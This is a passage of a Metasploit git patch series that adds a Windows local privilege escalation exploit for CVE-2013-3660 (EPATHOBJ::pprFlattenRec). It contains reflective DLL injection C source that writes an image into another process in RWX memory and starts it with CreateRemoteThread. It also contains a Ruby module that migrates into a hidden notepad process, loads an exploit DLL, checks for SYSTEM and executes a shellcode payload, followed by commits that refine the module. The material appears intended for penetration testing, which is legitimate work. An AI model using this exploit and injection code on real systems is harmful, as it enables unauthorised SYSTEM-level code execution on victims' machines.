+			uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );	
+	
+			// use the functions name ordinal as an index into the array of name pointers
+			uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
+
+			// return the File Offset to the ReflectiveLoader() functions code...
+			return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
+		}
+		// get the next exported function name
+		uiNameArray += sizeof(DWORD);
+
+		// get the next exported function name ordinal
+		uiNameOrdinals += sizeof(WORD);
+	}
+
+	return 0;
+}
+//===============================================================================================//
+// Loads a DLL image from memory via its exported ReflectiveLoader function
+HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
+{
+	HMODULE hResult                    = NULL;
+	DWORD dwReflectiveLoaderOffset     = 0;
+	DWORD dwOldProtect1                = 0;
+	DWORD dwOldProtect2                = 0;
+	REFLECTIVELOADER pReflectiveLoader = NULL;
+	DLLMAIN pDllMain                   = NULL;
+
+	if( lpBuffer == NULL || dwLength == 0 )
+		return NULL;
+
+	__try
+	{
+		// check if the library has a ReflectiveLoader...
+		dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
+		if( dwReflectiveLoaderOffset != 0 )
+		{
+			pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
+
+			// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
+			// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
+			if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
+			{
+				// call the librarys ReflectiveLoader...
+				pDllMain = (DLLMAIN)pReflectiveLoader();
+				if( pDllMain != NULL )
+				{
+					// call the loaded librarys DllMain to get its HMODULE
+					if( !pDllMain( NULL, DLL_QUERY_HMODULE, &hResult ) )	
+						hResult = NULL;
+				}
+				// revert to the previous protection flags...
+				VirtualProtect( lpBuffer, dwLength, dwOldProtect1, &dwOldProtect2 );
+			}
+		}
+	}
+	__except( EXCEPTION_EXECUTE_HANDLER )
+	{
+		hResult = NULL;
+	}
+
+	return hResult;
+}
+//===============================================================================================//
+// Loads a PE image from memory into the address space of a host process via the image's exported ReflectiveLoader function
+// Note: You must compile whatever you are injecting with REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR 
+//       defined in order to use the correct RDI prototypes.
+// Note: The hProcess handle must have these access rights: PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | 
+//       PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ
+// Note: If you are passing in an lpParameter value, if it is a pointer, remember it is for a different address space.
+// Note: This function currently cant inject accross architectures, but only to architectures which are the 
+//       same as the arch this function is compiled as, e.g. x86->x86 and x64->x64 but not x64->x86 or x86->x64.
+HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter )
+{
+	BOOL bSuccess                             = FALSE;
+	LPVOID lpRemoteLibraryBuffer              = NULL;
+	LPTHREAD_START_ROUTINE lpReflectiveLoader = NULL;
+	HANDLE hThread                            = NULL;
+	DWORD dwReflectiveLoaderOffset            = 0;
+	DWORD dwThreadId                          = 0;
+
+	__try
+	{
+		do
+		{
+			if( !hProcess  || !lpBuffer || !dwLength )
+				break;
+
+			// check if the library has a ReflectiveLoader...
+			dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
+			if( !dwReflectiveLoaderOffset )
+				break;
+
+			// alloc memory (RWX) in the host process for the image...
+			lpRemoteLibraryBuffer = VirtualAllocEx( hProcess, NULL, dwLength, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE ); 
+			if( !lpRemoteLibraryBuffer )
+				break;
+
+			// write the image into the host process...
+			if( !WriteProcessMemory( hProcess, lpRemoteLibraryBuffer, lpBuffer, dwLength, NULL ) )
+				break;
+			
+			// add the offset to ReflectiveLoader() to the remote library address...
+			lpReflectiveLoader = (LPTHREAD_START_ROUTINE)( (ULONG_PTR)lpRemoteLibraryBuffer + dwReflectiveLoaderOffset );
+
+			// create a remote thread in the host process to call the ReflectiveLoader!
+			hThread = CreateRemoteThread( hProcess, NULL, 1024*1024, lpReflectiveLoader, lpParameter, (DWORD)NULL, &dwThreadId );
+
+		} while( 0 );
+
+	}
+	__except( EXCEPTION_EXECUTE_HANDLER )
+	{
+		hThread = NULL;
+	}
+
+	return hThread;
+}
+//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h b/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h
new file mode 100755
index 0000000000..d8419858a9
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/inject/src/LoadLibraryR.h
@@ -0,0 +1,41 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
+#define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
+//===============================================================================================//
+#include "ReflectiveDLLInjection.h"
+
+DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer );
+
+HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength );
+
+HANDLE WINAPI LoadRemoteLibraryR( HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter );
+
+//===============================================================================================//
+#endif
+//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h b/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h
new file mode 100755
index 0000000000..27db65dc1b
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/inject/src/ReflectiveDLLInjection.h
@@ -0,0 +1,51 @@
+//===============================================================================================//
+// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
+// All rights reserved.
+// 
+// Redistribution and use in source and binary forms, with or without modification, are permitted 
+// provided that the following conditions are met:
+// 
+//     * Redistributions of source code must retain the above copyright notice, this list of 
+// conditions and the following disclaimer.
+// 
+//     * Redistributions in binary form must reproduce the above copyright notice, this list of 
+// conditions and the following disclaimer in the documentation and/or other materials provided 
+// with the distribution.
+// 
+//     * Neither the name of Harmony Security nor the names of its contributors may be used to
+// endorse or promote products derived from this software without specific prior written permission.
+// 
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
+// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
+// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
+// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
+// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
+// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
+// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
+// POSSIBILITY OF SUCH DAMAGE.
+//===============================================================================================//
+#ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+#define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
+//===============================================================================================//
+#include <windows.h>
+// we declare some common stuff in here...
+
+#define DLL_METASPLOIT_ATTACH	4
+#define DLL_METASPLOIT_DETACH	5
+#define DLL_QUERY_HMODULE		6
+
+#define DEREF( name )*(UINT_PTR *)(name)
+#define DEREF_64( name )*(DWORD64 *)(name)
+#define DEREF_32( name )*(DWORD *)(name)
+#define DEREF_16( name )*(WORD *)(name)
+#define DEREF_8( name )*(BYTE *)(name)
+
+typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
+typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
+
+#define DLLEXPORT   __declspec( dllexport ) 
+
+//===============================================================================================//
+#endif
+//===============================================================================================//
diff --git a/external/source/exploits/cve-2013-3660/rdi.sln b/external/source/exploits/cve-2013-3660/rdi.sln
new file mode 100755
index 0000000000..ee7fc4ace6
--- /dev/null
+++ b/external/source/exploits/cve-2013-3660/rdi.sln
@@ -0,0 +1,46 @@
+
+Microsoft Visual Studio Solution File, Format Version 12.00
+# Visual Studio Express 2012 for Windows Desktop
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "inject", "inject\inject.vcxproj", "{EEF3FD41-05D8-4A07-8434-EF5D34D76335}"
+EndProject
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "dll\reflective_dll.vcxproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|ARM = Debug|ARM
+		Debug|Win32 = Debug|Win32
+		Debug|x64 = Debug|x64
+		Release|ARM = Release|ARM
+		Release|Win32 = Release|Win32
+		Release|x64 = Release|x64
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.ActiveCfg = Release|ARM
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|ARM.Build.0 = Release|ARM
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.ActiveCfg = Release|Win32
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|Win32.Build.0 = Release|Win32
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.ActiveCfg = Release|x64
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Debug|x64.Build.0 = Release|x64
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.ActiveCfg = Release|ARM
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|ARM.Build.0 = Release|ARM
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.ActiveCfg = Release|Win32
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|Win32.Build.0 = Release|Win32
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.ActiveCfg = Release|x64
+		{EEF3FD41-05D8-4A07-8434-EF5D34D76335}.Release|x64.Build.0 = Release|x64
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.ActiveCfg = Release|ARM
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|ARM.Build.0 = Release|ARM
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.ActiveCfg = Release|x64
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|x64.Build.0 = Release|x64
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.ActiveCfg = Release|ARM
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|ARM.Build.0 = Release|ARM
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.ActiveCfg = Release|x64
+		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|x64.Build.0 = Release|x64
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal
diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
new file mode 100644
index 0000000000..d3ae1189ce
--- /dev/null
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -0,0 +1,158 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/windows/process'
+
+class Metasploit3 < Msf::Exploit::Local
+	Rank = AverageRanking
+
+	include Msf::Post::Common
+	include Msf::Post::File
+	include Msf::Post::Windows::Priv
+	include Msf::Post::Windows::Process
+
+	def initialize(info={})
+		super(update_info(info, {
+			'Name'           => 'Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation',
+			'Description'    => %q{
+					This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage
+				of uninitialized data which allows to corrupt memory. At the moment, the module has
+				been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Tavis Ormandy <taviso[at]cmpxchg8b.com>', # Vulnerability discovery and Original Exploit
+					'progmboy <programmeboy[at]gmail.com>',    # Original Exploit
+					'Keebie4e',    # Metasploit integration
+					'egypt',       # Metasploit integration
+					'sinn3r',      # Metasploit integration
+					'juan vazquez' # Metasploit integration
+				],
+			'Arch'           => ARCH_X86,
+			'Platform'       => 'win',
+			'SessionTypes'   => [ 'meterpreter' ],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'thread',
+				},
+			'Targets'        =>
+				[
+					[ 'Automatic', { } ]
+				],
+			'Payload'        =>
+				{
+					'Space'       => 4096,
+					'DisableNops' => true
+				},
+			'References'     =>
+				[
+					[ 'CVE', '2013-3660' ],
+					[ 'EDB', '25912' ],
+					[ 'OSVDB', '93539' ],
+					[ 'URL', 'http://seclists.org/fulldisclosure/2013/May/91' ],
+				],
+			'DisclosureDate' => 'May 15 2013',
+			'DefaultTarget'  => 0
+		}))
+
+	end
+
+	def check
+		os = sysinfo["OS"]
+		if os =~ /windows/i
+			return Exploit::CheckCode::Vulnerable
+		end
+	end
+
+	def add_railgun_functions
+		session.railgun.add_function(
+			'ntdll',
+			'NtAllocateVirtualMemory',
+			'DWORD',
+			[
+				["DWORD", "ProcessHandle", "in"],
+				["PBLOB", "BaseAddress", "inout"],
+				["PDWORD", "ZeroBits", "in"],
+				["PBLOB", "RegionSize", "inout"],
+				["DWORD", "AllocationType", "in"],
+				["DWORD", "Protect", "in"]
+			])
+	end
+
+	def junk(n=4)
+		return rand_text_alpha(n).unpack("V").first
+	end
+
+	def create_proc()
+		windir = client.fs.file.expand_path("%windir%")
+		# Select path of executable to run depending the architecture
+		if sysinfo['Architecture'] =~ /x86/
+			cmd = "#{windir}\\System32\\notepad.exe"
+		else
+			cmd = "#{windir}\\Sysnative\\notepad.exe"
+		end
+		# run hidden
+		proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+		return proc.pid
+	end
+
+	def exploit
+
+		if sysinfo["Architecture"] =~ /wow64/i
+			fail_with(Exploit::Failure::NoTarget, "Running against WOW64 is not supported")
+		elsif sysinfo["Architecture"] =~ /x64/
+			fail_with(Exploit::Failure::NoTarget, "Running against 64-bit systems is not supported")
+		end
+
+		print_status("Creating a new process and migrating...")
+		new_pid = create_proc
+
+		if not new_pid
+			print_error("Filed to create the new process, trying in the current one, if unsuccessful migrate by yourself")
+		else
+			begin
+				print_status("Migrating to #{new_pid}")
+				session.core.migrate(new_pid)
+				print_good("Successfully migrated to process #{target_pid}")
+			rescue ::Exception => e
+				print_error("Could not migrate in to process, trying in the current one, if unsuccessful migrate by yourself")
+			end
+		end
+
+		vprint_status("Adding the railgun stuff...")
+		add_railgun_functions
+
+		session.core.load_library({
+			"LibraryFilePath" => File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-3660", "exploit.dll"),
+			"UploadLibrary"   => true,
+			"Extension"       => false,
+			"TargetFilePath"  => "#{rand_text_alpha(5 + rand(3))}.dll",
+			"SaveToDisk"      => false
+		})
+
+		print_status("Checking privileges after exploitation...")
+
+		if not is_system?
+			fail_with(Exploit::Failure::Unknown, "The exploitation wasn't successful")
+		else
+			print_good("Exploitation successful!")
+		end
+
+		if execute_shellcode(payload.encoded, 0x0c0c0000)
+			print_good("Enjoy!")
+		else
+			fail_with(Exploit::Failure::Unknown, "Error while executing the payload")
+		end
+
+	end
+
+end

From 00416f3430d6eea6b90e78b69d062de56fd0cf11 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Fri, 28 Jun 2013 18:23:49 -0500
Subject: [PATCH 02/11] Add a new print_status

---
 modules/exploits/windows/local/ppr_flatten_rec.rb | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index d3ae1189ce..436715db01 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -131,6 +131,8 @@ class Metasploit3 < Msf::Exploit::Local
 		vprint_status("Adding the railgun stuff...")
 		add_railgun_functions
 
+		print_status("Trying to load the exploit and executing...")
+
 		session.core.load_library({
 			"LibraryFilePath" => File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-3660", "exploit.dll"),
 			"UploadLibrary"   => true,

From 3ab948209b1a01b33d62edef2266245e11a7597b Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Fri, 28 Jun 2013 20:44:42 -0500
Subject: [PATCH 03/11] Fix module according to @wchen-r7 feedback

---
 .../exploits/windows/local/ppr_flatten_rec.rb | 27 +------------------
 1 file changed, 1 insertion(+), 26 deletions(-)

diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 436715db01..09749eb9e6 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -14,7 +14,6 @@ require 'msf/core/post/windows/process'
 class Metasploit3 < Msf::Exploit::Local
 	Rank = AverageRanking
 
-	include Msf::Post::Common
 	include Msf::Post::File
 	include Msf::Post::Windows::Priv
 	include Msf::Post::Windows::Process
@@ -73,32 +72,11 @@ class Metasploit3 < Msf::Exploit::Local
 		end
 	end
 
-	def add_railgun_functions
-		session.railgun.add_function(
-			'ntdll',
-			'NtAllocateVirtualMemory',
-			'DWORD',
-			[
-				["DWORD", "ProcessHandle", "in"],
-				["PBLOB", "BaseAddress", "inout"],
-				["PDWORD", "ZeroBits", "in"],
-				["PBLOB", "RegionSize", "inout"],
-				["DWORD", "AllocationType", "in"],
-				["DWORD", "Protect", "in"]
-			])
-	end
-
-	def junk(n=4)
-		return rand_text_alpha(n).unpack("V").first
-	end
-
 	def create_proc()
-		windir = client.fs.file.expand_path("%windir%")
+		windir = expand_path("%windir%")
 		# Select path of executable to run depending the architecture
 		if sysinfo['Architecture'] =~ /x86/
 			cmd = "#{windir}\\System32\\notepad.exe"
-		else
-			cmd = "#{windir}\\Sysnative\\notepad.exe"
 		end
 		# run hidden
 		proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
@@ -128,9 +106,6 @@ class Metasploit3 < Msf::Exploit::Local
 			end
 		end
 
-		vprint_status("Adding the railgun stuff...")
-		add_railgun_functions
-
 		print_status("Trying to load the exploit and executing...")
 
 		session.core.load_library({

From fb67002df9bf9725639ca27bf885bb5192eb5443 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Fri, 28 Jun 2013 21:29:20 -0500
Subject: [PATCH 04/11] Switch from print_error to print_warning

---
 modules/exploits/windows/local/ppr_flatten_rec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 09749eb9e6..1254b1d751 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Local
 				session.core.migrate(new_pid)
 				print_good("Successfully migrated to process #{target_pid}")
 			rescue ::Exception => e
-				print_error("Could not migrate in to process, trying in the current one, if unsuccessful migrate by yourself")
+				print_warning("Could not migrate in to process, trying in the current one, if unsuccessful migrate by yourself")
 			end
 		end
 

From 32ae7ec2fa3e0ae6b0cf49528bbb494e82f5852d Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Fri, 28 Jun 2013 21:30:33 -0500
Subject: [PATCH 05/11] Fix error description and bad variable usage

---
 modules/exploits/windows/local/ppr_flatten_rec.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 1254b1d751..281bdcaf7a 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -100,9 +100,9 @@ class Metasploit3 < Msf::Exploit::Local
 			begin
 				print_status("Migrating to #{new_pid}")
 				session.core.migrate(new_pid)
-				print_good("Successfully migrated to process #{target_pid}")
+				print_good("Successfully migrated to process #{new_pid}")
 			rescue ::Exception => e
-				print_warning("Could not migrate in to process, trying in the current one, if unsuccessful migrate by yourself")
+				print_warning("Unable to migrate to process #{new_pid.to_s}, trying {current_pid.to_s} instead. If still unsuccessful, please migrate manually")
 			end
 		end
 

From 427e26c4dcda2de952f8551d14628f666a139fb9 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Fri, 28 Jun 2013 21:36:49 -0500
Subject: [PATCH 06/11] Fix current_pid

---
 modules/exploits/windows/local/ppr_flatten_rec.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 281bdcaf7a..2c0b9d0278 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -102,7 +102,7 @@ class Metasploit3 < Msf::Exploit::Local
 				session.core.migrate(new_pid)
 				print_good("Successfully migrated to process #{new_pid}")
 			rescue ::Exception => e
-				print_warning("Unable to migrate to process #{new_pid.to_s}, trying {current_pid.to_s} instead. If still unsuccessful, please migrate manually")
+				print_warning("Unable to migrate to process #{new_pid.to_s}, trying current #{session.sys.process.getpid} instead. If still unsuccessful, please migrate manually")
 			end
 		end
 

From a5c3f4ca9b01fddc98cfa0eb8f03d3c831d62013 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sat, 29 Jun 2013 08:54:00 -0500
Subject: [PATCH 07/11] Modify ruby code according to comments

---
 lib/msf/core/post/windows/process.rb          |  8 +++-
 .../exploits/windows/local/ppr_flatten_rec.rb | 39 ++++++++++---------
 2 files changed, 26 insertions(+), 21 deletions(-)

diff --git a/lib/msf/core/post/windows/process.rb b/lib/msf/core/post/windows/process.rb
index 7ec019563d..5ff935b3c6 100644
--- a/lib/msf/core/post/windows/process.rb
+++ b/lib/msf/core/post/windows/process.rb
@@ -15,10 +15,14 @@ module Process
 	#
 	# @return [Boolean] True if successful, otherwise false
 	#
-	def execute_shellcode(shellcode, base_addr, pid=nil)
+	def execute_shellcode(shellcode, base_addr=nil, pid=nil)
 		pid ||= session.sys.process.getpid
 		host  = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
-		shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
+		if base_addr.nil?
+			shell_addr = host.memory.allocate(shellcode.length)
+		else
+			shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
+		end
 		if host.memory.write(shell_addr, shellcode) < shellcode.length
 			vprint_error("Failed to write shellcode")
 			return false
diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 2c0b9d0278..5f83031da7 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -34,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Local
 					'Keebie4e',    # Metasploit integration
 					'egypt',       # Metasploit integration
 					'sinn3r',      # Metasploit integration
+					'Meatballs',   # Metasploit integration
 					'juan vazquez' # Metasploit integration
 				],
 			'Arch'           => ARCH_X86,
@@ -72,17 +73,6 @@ class Metasploit3 < Msf::Exploit::Local
 		end
 	end
 
-	def create_proc()
-		windir = expand_path("%windir%")
-		# Select path of executable to run depending the architecture
-		if sysinfo['Architecture'] =~ /x86/
-			cmd = "#{windir}\\System32\\notepad.exe"
-		end
-		# run hidden
-		proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
-		return proc.pid
-	end
-
 	def exploit
 
 		if sysinfo["Architecture"] =~ /wow64/i
@@ -92,16 +82,26 @@ class Metasploit3 < Msf::Exploit::Local
 		end
 
 		print_status("Creating a new process and migrating...")
-		new_pid = create_proc
+
+		cmd = "#{expand_path("%windir%")}\\System32\\notepad.exe"
+		new_proc = session.sys.process.execute(cmd, nil, {'Hidden' => true })
+		new_pid = new_proc.pid
 
 		if not new_pid
 			print_error("Filed to create the new process, trying in the current one, if unsuccessful migrate by yourself")
 		else
+			print_status("Migrating to #{new_pid}")
+			migrate_res = false
+
 			begin
-				print_status("Migrating to #{new_pid}")
-				session.core.migrate(new_pid)
+				migrate_res = session.core.migrate(new_pid)
+			rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError
+				migrate_res = false
+			end
+
+			if migrate_res
 				print_good("Successfully migrated to process #{new_pid}")
-			rescue ::Exception => e
+			else
 				print_warning("Unable to migrate to process #{new_pid.to_s}, trying current #{session.sys.process.getpid} instead. If still unsuccessful, please migrate manually")
 			end
 		end
@@ -118,13 +118,13 @@ class Metasploit3 < Msf::Exploit::Local
 
 		print_status("Checking privileges after exploitation...")
 
-		if not is_system?
-			fail_with(Exploit::Failure::Unknown, "The exploitation wasn't successful")
-		else
+		if is_system?
 			print_good("Exploitation successful!")
+		else
+			fail_with(Exploit::Failure::Unknown, "The exploitation wasn't successful")
 		end
 
-		if execute_shellcode(payload.encoded, 0x0c0c0000)
+		if execute_shellcode(payload.encoded)
 			print_good("Enjoy!")
 		else
 			fail_with(Exploit::Failure::Unknown, "Error while executing the payload")
@@ -132,4 +132,5 @@ class Metasploit3 < Msf::Exploit::Local
 
 	end
 
+
 end

From 6878534d4bb821e66a57f25c57868e2d313050a9 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan.vazquez@metasploit.com>
Date: Sat, 29 Jun 2013 09:20:40 -0500
Subject: [PATCH 08/11] Clean Visual Studio Project

---
 data/exploits/cve-2013-3660/exploit.dll       | Bin 51200 -> 51200 bytes
 .../cve-2013-3660/dll/reflective_dll.vcxproj  |   1 +
 .../cve-2013-3660/dll/src/ReflectiveDll.c     |   5 -
 .../exploits/cve-2013-3660/inject/inject.sln  |  20 -
 .../cve-2013-3660/inject/inject.vcproj        | 360 ------------------
 .../cve-2013-3660/inject/inject.vcxproj       | 258 -------------
 .../inject/inject.vcxproj.filters             |  35 --
 .../inject/src/GetProcAddressR.c              | 116 ------
 .../inject/src/GetProcAddressR.h              |  36 --
 .../cve-2013-3660/inject/src/Inject.c         | 120 ------
 .../cve-2013-3660/inject/src/LoadLibraryR.c   | 234 ------------
